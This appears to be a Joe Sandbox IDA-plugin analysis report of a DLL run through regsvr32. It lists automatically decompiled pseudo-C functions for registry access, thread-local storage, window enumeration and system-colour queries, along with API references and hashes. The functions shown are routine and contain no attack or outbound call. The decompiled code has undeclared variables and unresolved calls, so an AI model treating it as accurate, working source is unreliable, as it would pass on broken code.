Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
String ID:
API String ID: 4082312370-3916222277
Opcode ID: 84249b34ba599e10f86a748b11bf971323544bb7ceb798a99d45ae20e4f25649
Instruction ID: 5cc4d931916d525f60b51837989f0dcd116bbc250f3dd37a85cd7baf65b0ea70
Opcode Fuzzy Hash: 84249b34ba599e10f86a748b11bf971323544bb7ceb798a99d45ae20e4f25649
Instruction Fuzzy Hash: 68418775D01259AFDB10DFE4C981ADDBBB4FF09380F60802AE456E7296EB349A09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100270F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E100270F4(void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t46;
				intOrPtr* _t65;
				void* _t85;
				void* _t88;

				_t79 = __edx;
				E10011A8C(E1002A7A1, _t88);
				_t37 =  *0x100371f4; // 0x39cf7dc9
				 *((intOrPtr*)(_t88 - 0x10)) = _t37;
				_t85 = __ecx;
				 *(_t88 - 0x120) = 0;
				_t38 = E10025DD7(__ecx, __edx);
				 *((intOrPtr*)(_t88 - 0x128)) = _t38;
				if(_t38 != 0) {
					do {
						_t79 = _t88 - 0x128;
						_t65 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x54)))) + 0x14))(_t88 - 0x128);
						if(_t65 != 0) {
							_t79 =  *_t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *((intOrPtr*)(_t88 - 0x128)) != 0);
				}
				_t98 =  *((intOrPtr*)(_t85 + 0x50));
				if( *((intOrPtr*)(_t85 + 0x50)) != 0) {
					_push("Software\\");
					E100072DF(_t88 - 0x11c, _t98);
					 *((intOrPtr*)(_t88 - 4)) = 0;
					E10025EA9(_t88 - 0x11c,  *((intOrPtr*)(_t85 + 0x50)));
					_push(0x1002bd94);
					_push(_t88 - 0x11c);
					_push(_t88 - 0x12c);
					_t46 = E10025E2B(_t88 - 0x11c);
					_push( *((intOrPtr*)(_t85 + 0x64)));
					 *((char*)(_t88 - 4)) = 1;
					_push(_t46);
					_push(_t88 - 0x124);
					E10025E2B(_t88 - 0x11c);
					 *((char*)(_t88 - 4)) = 3;
					E10002EB0( *((intOrPtr*)(_t88 - 0x12c)) + 0xfffffff0, _t79);
					_push(_t88 - 0x124);
					_push(0x80000001);
					E10026FE0(_t79);
					if(RegOpenKeyA(0x80000001,  *(_t88 - 0x11c), _t88 - 0x120) == 0) {
						if(RegEnumKeyA( *(_t88 - 0x120), 0, _t88 - 0x118, 0x104) == 0x103) {
							_push(_t88 - 0x11c);
							_push(0x80000001);
							E10026FE0(_t79);
						}
						RegCloseKey( *(_t88 - 0x120));
					}
					RegQueryValueA(0x80000001,  *(_t88 - 0x124), _t88 - 0x118, _t88 - 0x130);
					E10002EB0( *(_t88 - 0x124) - 0x10, _t79);
					E10002EB0( &(( *(_t88 - 0x11c))[0xfffffffffffffff0]), _t79);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return E10011A49(1,  *((intOrPtr*)(_t88 - 0x10)));
			}

0x100270f4
0x100270f9
0x10027104
0x1002710d
0x10027110
0x10027112
0x10027118
0x1002711f
0x10027125
0x10027127
0x1002712c
0x10027133
0x10027138
0x1002713a
0x10027143
0x10027143
0x10027146
0x10027127
0x1002714e
0x10027151
0x10027157
0x10027162
0x10027170
0x10027173
0x10027178
0x10027183
0x1002718a
0x1002718b
0x10027190
0x10027193
0x10027197
0x1002719e
0x1002719f
0x100271b0
0x100271b4
0x100271bf
0x100271c5
0x100271c6
0x100271e1
0x10027201
0x10027209
0x1002720a
0x1002720b
0x1002720b
0x10027216
0x10027216
0x10027232
0x1002723b
0x10027249
0x10027249
0x10027254
0x10027266

APIs

__EH_prolog.LIBCMT ref: 100270F9
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 100271D9
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 100271F6
RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 10027216
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 10027232

Strings

Software\, xrefs: 10027157

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prologOpenQueryValue
String ID: Software\
API String ID: 2161548231-964853688
Opcode ID: 8f5fb9bf604774f2f5c8c0ad35911cd31ac057cb48825dd578bb46884a2ac58f
Instruction ID: 1962ef047869c5eae126c053f5c8d1b80abc1b32300226f6e0fa91ddc6302b51
Opcode Fuzzy Hash: 8f5fb9bf604774f2f5c8c0ad35911cd31ac057cb48825dd578bb46884a2ac58f
Instruction Fuzzy Hash: 8F41BA31800529ABDB26DB64DC85EEFB7B9FF49300F500299F149E2152DB30AA95CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100284C5 Relevance: 10.6, APIs: 7, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E100284C5(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x10039e60
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					LeaveCriticalSection(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E100281B1(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E10028417(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x33c09d8
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E1001D1DB(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E10012400(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						LeaveCriticalSection(_v8);
					}
				}
				return _t32;
			}

0x100284c8
0x100284cc
0x100284ce
0x100284ce
0x100284d2
0x100284d5
0x100284db
0x100284e2
0x100285be
0x100285bf
0x100284e8
0x100284e8
0x100284eb
0x00000000
0x100284f1
0x100284f9
0x100284fd
0x1002851f
0x1002852c
0x10028521
0x10028528
0x10028528
0x1002852e
0x10028531
0x10028534
0x10028534
0x10028537
0x1002853a
0x1002853d
0x00000000
0x100284ff
0x100284ff
0x10028505
0x10028540
0x10028540
0x10028545
0x10028557
0x1002855c
0x10028561
0x10028547
0x10028547
0x1002854f
0x1002854f
0x10028569
0x1002856e
0x10028574
0x10028574
0x1002857c
0x1002857f
0x1002858d
0x10028592
0x10028599
0x1002859e
0x100285a4
0x100285a4
0x10028505
0x100285a7
0x100285ac
0x100285b6
0x100285b6
0x100285bf
0x100285bf
0x100284eb
0x100285c9

APIs

EnterCriticalSection.KERNEL32(10039E60,00000000,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4,10027772), ref: 100284D5
TlsGetValue.KERNEL32(10039E44,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4,10027772,1001E169), ref: 100284F3
LocalAlloc.KERNEL32(00000000,00000003,00000010,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4), ref: 1002854F
LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756), ref: 10028561
LeaveCriticalSection.KERNEL32(?,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4,10027772,1001E169), ref: 1002856E
TlsSetValue.KERNEL32(10039E44,00000000), ref: 1002859E
LeaveCriticalSection.KERNEL32(10039E60,?,?,10039E44,?,1002864F,?,00000000,?,00000000,?,?,10027756,100272A4,10027772,1001E169), ref: 100285BF

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$AllocLeaveLocalValue$Enter
String ID:
API String ID: 784703316-0
Opcode ID: 9183edeeeb5f95f15655831d666d7e5e2ea29da455bb9ff138bfc0532bd952bc
Instruction ID: 42035923af3460843ea60695f227a8d276cd2f9a2398779c9dcc3b04898e1297
Opcode Fuzzy Hash: 9183edeeeb5f95f15655831d666d7e5e2ea29da455bb9ff138bfc0532bd952bc
Instruction Fuzzy Hash: 15317679601A25AFD724DF54D8D8C5ABBA9FF043543A1C52AF81A87A11C730FEA1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FAB7 Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000FAB7(void* __ebx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E10020A8C(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0 || E10022AF4(_t42) != 0) {
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							} else {
								goto L12;
							}
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1000FAB7(_t37);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E10020A8C(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1000FA62(_t45, E10020A8C(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E10020A8C(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E10020A8C(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}

0x1000fab7
0x1000fab9
0x1000fac0
0x1000fb60
0x1000fb64
0x1000fb73
0x1000fb77
0x1000fb22
0x1000fb32
0x1000fb89
0x00000000
0x1000fb89
0x1000fb34
0x1000fb35
0x1000fb3c
0x1000fb4e
0x1000fb7d
0x1000fb7e
0x1000fb80
0x00000000
0x00000000
0x00000000
0x00000000
0x1000fb5b
0x1000fb5b
0x1000fb5b
0x1000fb5c
0x1000fb5d
0x1000fb81
0x1000fb86
0x00000000
0x1000fb88
0x1000fb3c
0x00000000
0x1000fb79
0x1000fad5
0x1000fada
0x1000fb0e
0x1000faf6
0x1000fafa
0x00000000
0x1000fb00
0x1000fb09
0x00000000
0x1000fb09
0x1000fafa
0x1000fb20
0x00000000

APIs

GetWindow.USER32(?,00000002), ref: 1000FAD2
GetParent.USER32(?), ref: 1000FAE3
GetWindow.USER32(?,00000002), ref: 1000FB06
GetWindow.USER32(?,00000002), ref: 1000FB18
GetWindowLongA.USER32 ref: 1000FB27
IsWindowVisible.USER32 ref: 1000FB41
GetTopWindow.USER32(?), ref: 1000FB67

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 45c12b3cd154513775a3311c7b08edcc1f922599047287d4c4c0225d90245408
Instruction ID: dadbd9181cf10047d4cafaf7575538d4f8b8fbdb8f288736131f18669cff5b5d
Opcode Fuzzy Hash: 45c12b3cd154513775a3311c7b08edcc1f922599047287d4c4c0225d90245408
Instruction Fuzzy Hash: A121C232601B24ABF621EB60DC59F2B76DCEF847D0F518918F941D7996CB24EC01EAA1

Uniqueness

Uniqueness Score: -1.00%

Function 10006840 Relevance: 10.6, APIs: 7, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006840() {
				char _v4;
				intOrPtr _v16;
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				intOrPtr* _t24;
				long _t27;
				signed int _t34;
				int _t38;
				long _t39;
				void* _t43;

				_t38 = 0;
				_t39 = _t27;
				if(SendMessageA( *(_t39 + 0x9cc), 0x1004, 0, 0) <= 0) {
					L7:
					SendMessageA( *(_t39 + 0x9cc), 0x1009, 0, 0);
					EnumWindows(E10006560, _t39);
					return SendMessageA( *(_t39 + 0x9cc), 0x1030, 0, 0);
				}
				do {
					if(SendMessageA( *(_t39 + 0x9cc), 0x102c, _t38, 2) == 2) {
						_push(1);
						_push(_t38);
						_t34 =  &_v4;
						_push(_t34);
						_t21 = E100114D3( *((intOrPtr*)(E1001D60B(_t39 + 0x9b0))));
						_t43 = _t43 + 4;
						ShowWindow(_t21, 0);
						_t24 = _v16 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						if((_t34 | 0xffffffff) - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t24)) + 4))(_t24);
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 < SendMessageA( *(_t39 + 0x9cc), 0x1004, 0, 0));
				goto L7;
			}

0x1000684a
0x1000684e
0x10006860
0x100068df
0x100068ef
0x100068f7
0x10006913
0x10006913
0x10006870
0x10006884
0x10006886
0x10006888
0x10006889
0x1000688d
0x1000689e
0x100068a3
0x100068a7
0x100068ad
0x100068b6
0x100068bd
0x100068c4
0x100068c4
0x100068bd
0x100068d7
0x100068da
0x00000000

APIs

SendMessageA.USER32 ref: 1000685C
SendMessageA.USER32 ref: 1000687F
SendMessageA.USER32 ref: 100068D8

Part of subcall function 1001D60B: __EH_prolog.LIBCMT ref: 1001D610
Part of subcall function 1001D60B: SendMessageA.USER32 ref: 1001D670

ShowWindow.USER32(00000000), ref: 100068A7
SendMessageA.USER32 ref: 100068EF
EnumWindows.USER32(Function_00006560), ref: 100068F7
SendMessageA.USER32 ref: 1000690D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$EnumH_prologShowWindowWindows
String ID:
API String ID: 1436300307-0
Opcode ID: b8330077a7c6c91814cf80aa7aa8760510c976a19c8b30208adaa8cfe6adeadc
Instruction ID: e09e5b1bfb2508a3607c84e4c2ec21d5782fafdb158dd9b7f3b164ad392aa89a
Opcode Fuzzy Hash: b8330077a7c6c91814cf80aa7aa8760510c976a19c8b30208adaa8cfe6adeadc
Instruction Fuzzy Hash: 7221D8B1A417416BF320D779CC86F97B7A9EBC9B64F208618F2559B1D1CAB0F841C724

Uniqueness

Uniqueness Score: -1.00%

Function 10006920 Relevance: 10.6, APIs: 7, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006920() {
				char _v4;
				intOrPtr _v16;
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				intOrPtr* _t24;
				long _t27;
				signed int _t34;
				int _t38;
				long _t39;
				void* _t43;

				_t38 = 0;
				_t39 = _t27;
				if(SendMessageA( *(_t39 + 0x9cc), 0x1004, 0, 0) <= 0) {
					L7:
					SendMessageA( *(_t39 + 0x9cc), 0x1009, 0, 0);
					EnumWindows(E10006560, _t39);
					return SendMessageA( *(_t39 + 0x9cc), 0x1030, 0, 0);
				}
				do {
					if(SendMessageA( *(_t39 + 0x9cc), 0x102c, _t38, 2) == 2) {
						_push(1);
						_push(_t38);
						_t34 =  &_v4;
						_push(_t34);
						_t21 = E100114D3( *((intOrPtr*)(E1001D60B(_t39 + 0x9b0))));
						_t43 = _t43 + 4;
						ShowWindow(_t21, 5);
						_t24 = _v16 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						if((_t34 | 0xffffffff) - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t24)) + 4))(_t24);
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 < SendMessageA( *(_t39 + 0x9cc), 0x1004, 0, 0));
				goto L7;
			}

0x1000692a
0x1000692e
0x10006940
0x100069bf
0x100069cf
0x100069d7
0x100069f3
0x100069f3
0x10006950
0x10006964
0x10006966
0x10006968
0x10006969
0x1000696d
0x1000697e
0x10006983
0x10006987
0x1000698d
0x10006996
0x1000699d
0x100069a4
0x100069a4
0x1000699d
0x100069b7
0x100069ba
0x00000000

APIs

SendMessageA.USER32 ref: 1000693C
SendMessageA.USER32 ref: 1000695F
SendMessageA.USER32 ref: 100069B8

Part of subcall function 1001D60B: __EH_prolog.LIBCMT ref: 1001D610
Part of subcall function 1001D60B: SendMessageA.USER32 ref: 1001D670

ShowWindow.USER32(00000000), ref: 10006987
SendMessageA.USER32 ref: 100069CF
EnumWindows.USER32(Function_00006560), ref: 100069D7
SendMessageA.USER32 ref: 100069ED

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$EnumH_prologShowWindowWindows
String ID:
API String ID: 1436300307-0
Opcode ID: 468f98660c5c26ad090c803682146e80f89e7c37594ee229ae0a6e03a35df727
Instruction ID: 8aa6dd810ea5f8fce897b46c54bbca1794302c4b2e7c65cab8bb62aa74441820
Opcode Fuzzy Hash: 468f98660c5c26ad090c803682146e80f89e7c37594ee229ae0a6e03a35df727
Instruction Fuzzy Hash: 9B2108B5A417016BF320D779CC86F97B7ADEBC8B60F204508F2599B1D1C6B0F801C664

Uniqueness

Uniqueness Score: -1.00%

Function 100280DA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100280DA(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x100280f5
0x100280fc
0x100280ff
0x10028102
0x10028105
0x10028110
0x10028147
0x10028147
0x10028152
0x10028157
0x10028157
0x1002815c
0x10028161
0x10028161
0x1002816a

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 10028108
RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 1002812B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 10028147
RegCloseKey.ADVAPI32(?,?,00000000), ref: 10028157
RegCloseKey.ADVAPI32(?,?,00000000), ref: 10028161

Strings

software, xrefs: 100280F0

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 79040a043cc2ebdfb0515227849aabbb19742b9991881b166ebfcf46e16d830a
Instruction ID: c072ce9508b34948441c9f22deec9e648e56c65b8eed7af3098084c238aca19d
Opcode Fuzzy Hash: 79040a043cc2ebdfb0515227849aabbb19742b9991881b166ebfcf46e16d830a
Instruction Fuzzy Hash: 5111F876D01159FBDB11DB9ADC88DDFBFBCEF85740B5000AAF514A2121D3709A15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000818F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000818F(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E10007FDE() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100399e0(_a4, _a8);
			}

0x1000819c
0x100081b5
0x1000821c
0x1000821c
0x1000821e
0x00000000
0x1000821f
0x100081b7
0x100081be
0x00000000
0x100081d7
0x100081d8
0x100081db
0x100081e9
0x100081ec
0x100081f4
0x100081f5
0x100081f6
0x100081f7
0x100081fe
0x10008201
0x10008205
0x10008212
0x10008212
0x10008218
0x00000000
0x10008218
0x100081be
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 100081CD
GetSystemMetrics.USER32 ref: 100081E5
GetSystemMetrics.USER32 ref: 100081EC
lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10008212

Strings

DISPLAY, xrefs: 10008209
B, xrefs: 100081AC

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpyn
String ID: B$DISPLAY
API String ID: 2307409384-3316187204
Opcode ID: 6c50faab95cb92ec3f3272489f88efe4b5cf7cc8fb105345147f78cfb5ff8d5e
Instruction ID: 54391ecb7454ccaf13049b9eab499f0b814914f08b1d1b4d5a1f3df2c47cf0c0
Opcode Fuzzy Hash: 6c50faab95cb92ec3f3272489f88efe4b5cf7cc8fb105345147f78cfb5ff8d5e
Instruction Fuzzy Hash: 3B117371941624ABEF11DF64CCC8A5B7BA8FF157D1B614061FD45AE10AD271DA01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 100232C9 Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100232C9(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x100232d3
0x100232d9
0x100232e0
0x100232e7
0x100232ee
0x100232fb
0x10023302
0x10023305
0x10023308
0x1002330c

APIs

GetSysColor.USER32(0000000F), ref: 100232D5
GetSysColor.USER32(00000010), ref: 100232DC
GetSysColor.USER32(00000014), ref: 100232E3
GetSysColor.USER32(00000012), ref: 100232EA
GetSysColor.USER32(00000006), ref: 100232F1
GetSysColorBrush.USER32(0000000F), ref: 100232FE
GetSysColorBrush.USER32(00000006), ref: 10023305

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

